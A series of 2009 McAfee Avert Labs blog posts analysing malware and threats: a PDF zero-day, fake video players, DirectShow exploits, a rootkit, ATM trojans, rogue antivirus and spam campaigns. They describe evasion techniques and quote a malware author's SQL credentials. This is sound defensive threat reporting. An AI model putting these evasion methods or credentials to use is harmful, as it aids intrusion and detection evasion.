It first gets a KERNEL32.dll image base using the Windows PEB structure, sets up the required Windows APIs, then decrypts and executes its malware payload. This specific malicious PDF file contains three embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE and sends the information gathered from the infected machine to a free host-redirection service based in China:

• [blocked].3322.org
• [blocked].2288.org

The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.

According to Adobe, the Rich Media annotation is new to Acrobat 9.x and will not be understood by PDF document viewers that can support only up to Acrobat 8 specifications. Thus, if you place the SWF file with Acrobat 9 into the PDF files, it is not readable by Acrobat or Adobe Reader 8 and older versions, and will not be vulnerable to this attack.

Although details of this vulnerability have not yet become public, more attackers are likely to take advantage of this weakness. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (released July 21).

Even though anti-malware vendors continue to add detection for new zero-day threats, there are several things you can do to mitigate such risks. Refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

This bug is currently being investigated by the Adobe Product Security Incident Response Team.

(Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)

I cribbed the title from Megadeth–I admit it. However, when looking at this year’s growth in malware it seems disturbingly appropriate. Global economic downturn or not, malware production continues at a record-setting pace because this is how many cybercriminals make their money. (Malware long ago stopped being about fun and bragging.)

We at Avert Labs have seen almost as much unique malware in the first half of 2009 as we did in ALL of 2008. This is quite something when you consider that in 2008 we saw the greatest ever growth in malware:

For you math and data junkies that comes out to an average of 200,000 unique pieces monthly or more than 6,000 daily. Yep–that was over 6,000 on a daily basis. Bear in mind these are malware we consider unique (something we had to write a driver for) and does not count all the other malware we detect generically or heuristically, but we will save that discussion for another post. When you add in the generic and heuristic detections the number becomes truly mind boggling.

Even when compared to the first half of 2008, the growth is almost three times what it was. The sheer growth is even challenging Moore’s Law a bit.

Our latest whitepaper, Financial Fraud and Internet Banking: Threats and Countermeasures, explains how much of this malware can be used to scam and steal from users. The new whitepaper was written by one of our French researchers, François Paget. It can be found here.

There are many reasons why malware continues to grow, but it is mainly a criminal’s game at this point. Malware steals data. The people who write and distribute malware are criminals. Pretty plain and simple to me. The tools and code are readily available and that will certainly not change, but (and this is important) it is also definitely NOT doomsday. Staying educated and updated goes a long way toward safe computing.

Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

In our world of anti-malware, we follow a simple formula, “Media + Celebrity = Watch out for malware”. Whether you are an eager fan or just someone surfing on the web for news, beware. An Internet search, combined with the right keywords on your favorite search engine, is expected to lead you to malware. In our investigation on the following case, it has led us to a malicious website hosted at [removed].report-cnn.com/[removed].

Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been repeatedly used in similar attempts in the past. Using this method, the user is often enticed to an attractive video but must install a new video player program.

The victim clicks on a link that allows downloads and installs an executable program which subsequently installs malware. It usually follows with a pop-up message reporting that the downloaded video player program is corrupted!

The current case comes with a slight twist. An option to download the “video player” is given only if you already have Adobe Flash installed. This first step allows users to view some initial pictures, as if they were browsing legitimate news content from the site. It then further entice users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user off an external link from Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

This malicious website recognizes the target operating system by checking the User-Agent banner information sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delievered to Mac OS-based web browsers.

The malware downloaded from this site are currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware will be detected as OSX/Puper.a Trojan. In other related cases, we are currently detecting them as Generic FakeAlert.a and Generic FakeAlert.c.

We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

Today, Microsoft released a security advisory on active attacks in the wild using a vulnerability in Microsoft Office Web Components. Computers installed with Microsoft Office features that uses vulnerable versions of the Microsoft Office Web Components could be infected with malware when browsing upon malicious websites in Internet Explorer. 

From our investigation, Exploit-CVE2009-1136, a new 0-day exploit was added into web exploit toolkits that widely released Exploit-MSDirectShow.b  on hijacked websites in China just the previous week.  Since the start of this new wave of attacks, new trojans installed by Exploit-CVE2009-1136 has been detected by Artemis technology which also allow us to get a global view of the spread of this new threat.

In one of the new trojan samples used by Exploit-CVE2009-1136, we first saw Artemis queries coming from China at 11:53 GMT on July 13th, 2009. We didn’t have automatic protection for this at this point, but various systems analyzing the threat details soon mark this as malicious.

By now, this sample has spread to many other Internet users in China, and is now queried and blocked by Artemis more than 328 times at more than 145 unique IP addresses (ISP , not end point).

Besides China, we only saw Artemis queries coming from Virus Total (Spain) and fellow malware researchers in the UK and Germany in small numbers.

We will post more information as we receive it.

We recently received a new sample of the Mac malware OSX/Puper.a. This file [MD5 Sum: 428143005E07E510302BA431FE0C28CC], which disguises itself as a Mac Cinema Installer, was recently mentioned in PC Magazine.

When the DMG file is executed on the Mac, it displays the following message:

As the execution continues, the malware gets installed on the machine with the root user’s credentials. Below is a screen shot of the malware after installation:

The file AdobeFlash in the screen above is the malicious script file. This file is obfuscated using Uuencode and looks like this before decoding:

And like this after decoding:

From the shot above we can see another set of obfuscated code after the schedule-task instructions. We can also see that the malware creates a scheduled job to run itself once every five hours, shown as below:

Decoding the rest of the script reveals the following:

From the screen above we see that the malware downloads the file generator.pl and executes it.

Although the number of malware for Macs still remains tiny when compared with the number of malware for Microsoft Windows, new variants of malware such as this remind us to be careful.

Adobe Flash applications have been a major security concern during the past couple of years. The large number of Flash vulnerabilities published, coupled with its popularity and wide distribution, makes Flash files an attractive target for cybercriminals. Infecting banner ads are not new; these Flash-based “malvertisements” have plagued adservers and popular websites for a very long time.

A malicious Flash file can be crafted to contain an image or an animation to fool unsuspecting users into believing the file is legitimate. Lately, we have observed a spike in the number of websites hosting malicious flash files that exploit the integer-overflow vulnerability in the DefineSceneAndFrameLabelData tag. These are popularly known as Exploit-CVE2007-0071.

Although the vulnerability has been fixed for some time, the bad guys are always coming up with new and progressive mechanisms to evade detection.

Flash Player 9 and later comes with a new virtual machine called ActionScript Virtual Machine 2 (AVM2), which is designed to execute programs written in the ActionScript 3.0 language. ActionScript 3.0 supports a native method called loadBytes().

The flash.display.Loader class supports the loadBytes method, which takes a byte array to fill the loader with data. The bytes injected can be in the form of GIF, JPG, PNG, or SWF files. Embedding the vulnerable SWF (small web format) file inside the loader provides attackers the multifold advantage of ensuring successful exploitation while complicating the analysis for researchers.

The image above shows the embedded malicious SWF file inside the loader file. This loader uses the loadBytes method to inject the bytes into the security context of the application.

In recent versions of the exploit, the embedded SWF file is encrypted using various obfuscation techniques such as byte-shifting algorithms or random XOR keys, as shown in the figure below.

We expect this trend to continue as cybercriminals target low-hanging fruit such as applications, and Flash is no exception. As always, make sure you are protected and the Flash player is updated to the latest version. Happy surfing .

In our blog from yesterday, we described how Exploit-MSDirectShow.b has been widely deployed on hijacked websites in China, targeting Internet Explorer users. When a victim browses one of these sites, malware is downloaded to the computer. To better understand the current impact of these attacks, we have monitored the prevalence of its downloaded malware through Artemis.

Since yesterday, our Artemis technology has detected new malware installed by Exploit-MSDirectShow.b that was targeted to certain geographical regions of the world.

In China, a new sample variant was queried by Artemis more than 180 times at more than 70 unique IP addresses (ISP, not end point) over a 24-hour period. This is represented by the many red dots in the following figure:

This particular sample was first seen only in mainland China, but we soon saw Artemis queries from Korea, Japan, Australia, Singapore, Taiwan, and the United States in very small numbers. As we know, the web has no boundaries and the potential risks of the DirectShow zero-day vulnerability is not limited to specific languages or regions. We will closely monitor this trend.

This sample is already heuristically detected in the DATs and Artemis. After our analysis, it has now been classified as Downloader-BRT Trojan.

Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

Current status for each of the content areas:

• Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
• HIPS: Generic buffer overflow should provide coverage
• McAfee Network Security Platform: Coverage was provided on July 6
• McAfee Vulnerability Manager: Coverage was provided on July 6
• MNAC: Coverage will be provided in the next release
• VirusScan Enterprise: Buffer overflow protection should provide coverage
• McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

• http://download.nai.com/products/mcafee-avert/stinger.exe

We will continue to monitor the situation to provide comprehensive coverage.

If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.

At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.

When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.

During research, one of the things we found interesting was the web exploit toolkit explicitly checks that the origin of the hyperlinked references do not come from the “.gov.cn”  and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references are not coming from any of these domains, it starts sending a cocktail of exploits including:

• Exploit-MSDirectShow.b (zero-day)
• Exploit-XMLhttp.d
• Exploit-RealPlay.a
• JS/Exploit-BBar
• Exploit-MS06-014

Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.

From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.

When successful, the attacker installs a downloader Trojan that could download other malware.

This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, on IE 7, the browser on Windows Vista systems, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.

The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).

We will post more information as we receive it.

(Thanks to our colleague Wei Wang for assistance in this analysis.)

It has been almost a year since the rogue anti-virus products, a.k.a. scareware, became rampant.  These Trojan families are typically spread via drive-by downloads, search-engine-optimization poisoning, spam campaigns, and clever social engineering.
Having these methods discussed in earlier blogs, today we will look into the protection mechanisms adopted by these fake alerts Trojan families to evade detection from antivirus vendors.

• Code obfuscation using junk instructions

In the above screenshot, lots of junk code is visible between valid instructions. Usage of junk instructions is being used widely across Fake Alert families.

• Fake API calls

The screen shot shows the usage of API called SetArcDirection which is not necessary in the code. These kinds of unnecessary APIs are used by malware to defeat emulation. Sometimes, API calls that don’t exist are also used by these families to check if they are being emulated.

• Customized packer

Lot of fake alert families uses their own custom packers, encryption routines.  Some of the families patch the existing packers.

• Use of XMM and MMX instruction sets

Usage of XMM, MMX and FPU instructions which are not needed in the code along with the other junk code are also utilized by most of the fake alert families.

The techniques discussed above are not something very new and has been used in notable malware. But fake alert Trojans use these evasion techniques to there full potential with every new variant. Just when we thought we’re seeing a decline in adware and spyware – fake alert Trojans families have stepped in to claim the scum of the Internet tag.

A few days ago I got a chance to look at a recent variant of the DNSChanger.ad. It drops a common rootkit that is mostly associated with FakeAlert and DNSChanger Trojans. Over a period of time the dropped sys file names have changed from tdss*.sys to seneka*.sys to skynet*.sys and so on. Our memory detection and cleaning for this rootkit is Generic Rootkit.d. The techniques of this threat are well known now. It basically uses inline hooks on IofCallDriver, IofCompleteRequest, NtFlushInstructionCache, NtEnumerateKey, etc. This Trojan removes permissions from its registry entries as well.

The malware has a hidden sys file in the system32\drivers directory with a name like skynet*.sys. One can use a rootkit analysis tool or just windbg to restore the inline hooks installed by the malware. Even though the malicious file is no longer hidden after hook restoration, the malware can recreate the file after its deletion. It is common that malware try to “watch” or recreate their components but the curious thing was that File Monitor (filemon) did not show any activity and other API-tracing approaches also didn’t point to anything that could explain the rebirth of this file.

Taking a closer look, we found that the malware uses one of the delayed system worker threads to call, at regular intervals, ZwCreateFile in a loop created using KeDelayExecutionThread. The following figure shows the relevant malware code and thread.

This explains how the file is recreated after its deletion. This thread also watches the malware’s registry. This thread continuously restores the system service descriptor table (SSDT) using the code shown below. So any tracing utility that hooks SSDT to monitor activity would not work.

If it were just SSDT rewriting, then filemon should have reported the file activity. But the malware also removes all filesystem filter drivers; because filemon also uses a filesystem filter, it didn’t report anything. The figure below shows the device stack before and after infection. Note that all filters are removed after infection.

And here is the code that removes attached filters.

Actually the attached device field only for NTFS is nulled out, and the rest of the stack remains dangling.

Figure 3 also shows that not only is the filemon filter driver removed but even the Filter Manager has been effectively removed. Removing all filters and rewriting SSDT will thwart analysis tools that use these techniques but may also break other software as well. Obviously it does not matter to malware as long as its rootkit works in a stealthy manner in most environments. It’s a tradeoff that many malware make and this one has made its choice.

The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is a part of the actual SQL query to log into the malicious SQL server:

Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

mengmeng has been malicious, and what’s more, was careless to leave his login credentials in the open. Please keep your DATs updated to stay secure!

So, Iran had elections this weekend. Some people don’t agree with the results. As a consequence, some people are organizing DDoS attacks against Iranian websites, more precisely:

http://www.leader.ir/
http://president.ir/
http://www.irib.ir/
http://www.iribnews.ir/

and some specific URLs on those domains.

No guys, that’s not the right path and, as it is a malicious activity, we are detecting the tools being distributed to create this DDoS. In my opinion, I doubt that it would cause much damage, since this looks more like a media thing than a huge DDoS attack. The applications use old techniques and unless there are lots of “followers,” I don’t think that it will cause much impact. We will continue to monitor the situation.

Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

We frequently encounter password stealers and backdoors in computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see these malware directly implemented in banks’ automated teller machines. In these cases, Trojans have to be installed by people who have physical access to the machines. Data collecting and malware removal would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3,  The Register also raised public awareness by covering the story. 

When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also-–through a password-protected routine–control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:

If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading .

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles…..

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use it if you can avoid it.

It was very encouraging to see that more than 40 people came to Budapest, Hungary, to discuss and agree on new industry standards as part of the effort undertaken by the Anti-Malware Standards Organization (www.amtso.org.) The awesome historic surroundings set the mood for our discussions.

Seeing such a great turnout in the current economic climate shows how much AMTSO members care about raising the standards of testing anti-malware products. Especially considering the recent rise in the number of rogue security products (such as the now infamous “Anti-virus XP 2009″), it is clear that we need transparent and fair testing more than ever.

AMTSO members finalized and adopted several new documents to the current portfolio. (Have a look at the collection of documents here: www.amtso.org/documents.html.)

But I would like to draw your attention to two papers that, in my opinion, represent very significant steps for the security industry as a whole.

• The first one is “AMTSO Analysis of Reviews Process,” and it presents the process of analyzing reviews. The creation of such a process paves the way to highlight great reviews and/or to expose substandard tests in public. (AMTSO promises to publish all the analyses they undertake.) I really hope that this process, designed to be transparent and fair, will improve the quality of testing and benefit both the developers and consumers of anti-malware technology. If you have doubts that this process is going to be unbiased I will remind you that AMTSO members work for competing security companies, and there would not be a snowball’s chance in hell to agree on the process if it were not designed to be fair. The next step is to put the “AMTSO Analysis of Reviews Process” into practice. I cannot wait to see how it will go.
• “AMTSO Best Practices for Testing In-the-Cloud Security Products” is the second very important milestone. Some anti-virus products started using “cloud” technologies (such as McAfee’s Artemis, which was launched in the beginning of 2008) and the number of cloud-based products is growing; so there is a need to address the fundamental problems associated with testing solutions that are not under the control of the tester. (That is, part of the product is not “in the hands” of the tester; moreover, it can change at any moment in time.) I think it is amazing that representatives of so many competing security companies agreed on fair and scientific principles of how to test cloud-based products. To be honest, when we started this effort we were rather sceptical about finding a sensible way to address all the problems that testers face when evaluating such technologies. The adoption of AMTSO best practices for testing in-the-cloud products means that our brainstorming was successful. I am very pleased to see the agreed results adopted and published. Thanks for that effort go to all the security researchers who contributed to the document and all AMTSO members who voted for it.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

In March 2009, we notified our customers on a new variant of the infamous Vundo trojan family which we detected as Ransom-F and raised its risk assessment to a Low-Profiled threat.  It was possibly the first indicators of a shift in the FakeAlert criminal model from instilling fear, to holding information technology resources for ransom but certainly not the last.

Last week, we came across to a new variant of a rogue security program branded by its creators as “System Security 2009″ and detected them as FakeAlert-CO, and some of its past similarly branded cousins as FakeAlert-SystemSecurity.

The updated variants were discovered from a web page hosted on trustedw{blocked}security.com.As most other rogue security programs to date, FakeAlert-CO displays spurious alerts and making fraudulent claims of infections that requires the user to pay a fee to “repair”. Following the trend of Ransom-F, we noticed “new features” in FakeAlert-COthat resembles some common characteristics of ransomware trojans.

Once installed, FakeAlert-CO may either terminates all running user process or prompts the user to reboot.

In either cases, it follows to pretend to perform a system scan and report detections of false and exaggerated threats.

What differs it from older variants, is that the user will no longer be allowed to open or execute any applications including Task Manager, Command Prompt or other system and office applications which are terminated by FakeAlert-CO. A message is displayed to the user to indicate that the files are infected and to resolve the issue, the user must activate FakeAlert-CO at a cost.

The “product” website is made to look fairly professional offering an option to purchase a 2-year license, or lifetime support license at a “discount” and even comes with 30-day money back guarantee!

You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

Uninstalling the System Security “product” will not be an option for the typical user, as there is neither an uininstaller function nor will the “Add or Remove Programs” in the control panel be allowed to be opened via the usual means.

However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

Affected VirusScan users may remove this threat using the latest DATs and engine.

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

